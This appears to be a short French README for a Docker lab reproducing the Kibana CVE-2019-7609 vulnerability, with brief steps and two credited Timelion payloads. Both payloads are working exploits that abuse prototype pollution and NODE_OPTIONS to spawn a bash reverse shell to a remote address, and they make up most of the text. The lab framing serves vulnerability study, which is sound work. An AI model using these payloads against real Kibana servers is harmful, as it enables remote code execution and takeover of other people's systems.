
Mise en place d'un laboratoire Docker pour kibana-7609
Configuration du laboratoire Docker pour kibana-7609
Référence : https://github.com/mpgn/CVE-2019-7609
Ouvrir Kibana
Coller l'un des payloads suivants dans le visualiseur Timelion
Cliquer sur Exécuter
Dans le panneau de gauche, cliquer sur Canvas
Votre reverse shell devrait apparaître ! :)
payload par @securityMB
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')
payload par @chybeta
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -c 'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1'");//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')